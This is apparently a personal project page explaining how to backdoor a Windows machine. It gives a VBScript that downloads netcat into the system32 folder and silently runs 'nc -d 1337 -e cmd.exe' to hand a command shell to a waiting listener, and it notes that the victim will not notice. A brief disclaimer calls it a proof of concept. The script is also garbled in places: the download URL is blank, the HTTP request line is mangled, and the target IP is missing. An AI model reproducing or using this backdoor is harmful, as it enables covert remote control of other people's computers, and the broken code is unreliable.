Create a backdoor into a Windows system

Using VBScript and netcat it is quite simple to create a basic backdoor into a users system with the priviledges of the user that ran the script. It's a very basic concept and all it does it download the netcat program (nc.exe) from a trusted website into the users c:\windows\system32 folder. What this does is allow you to run netcat from the command line without dealing with the full location of nc.exe. Once the file is in the system32 folder it can simple be run from any command prompt.

***This is a proof of concept and should not be used for illegal purposes. Only use this in your own test environment and I take no responsibility if you mess something up with this***

To set this up, you need to have a computer running netcat waiting for the incomming connection. To do that just run a simple command such as:

nc -l 1337

That's when we tell the script to run the following netcat command:

nc -d 1337 -e cmd.exe

What this does is tell netcat to connect to the IP on TCP port 1337. The -e switch tells netcat to execute cmd.exe and output it to the server waiting for the connection. The -d switch tells netcat to run in the background in a Windows environment. The user won't even know it's running without checking the process list.

Here's an example script that will automatically download nc.exe, write it to c:\windows\system32 and then execute the netcat command to connect to the remote server:

' Set your settings
    strFileURL = ""
    strHDLocation = "C:\WINDOWS\system32\nc.exe"
' Fetch the file
    Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") "GET", strFileURL, false
    If objXMLHTTP.Status = 200 Then
      Set objADOStream = CreateObject("ADODB.Stream")
      objADOStream.Type = 1 'adTypeBinary
      objADOStream.Write objXMLHTTP.ResponseBody
      objADOStream.Position = 0    'Set the stream position to the start
      Set objFSO = Createobject("Scripting.FileSystemObject")
        If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
      Set objFSO = Nothing
      objADOStream.SaveToFile strHDLocation
      Set objADOStream = Nothing
    End if
    Set objXMLHTTP = Nothing

Set objShell = CreateObject("WScript.Shell")

' Execute the connection
objShell.Exec("nc -d 1337 -e cmd.exe")

Back to my projects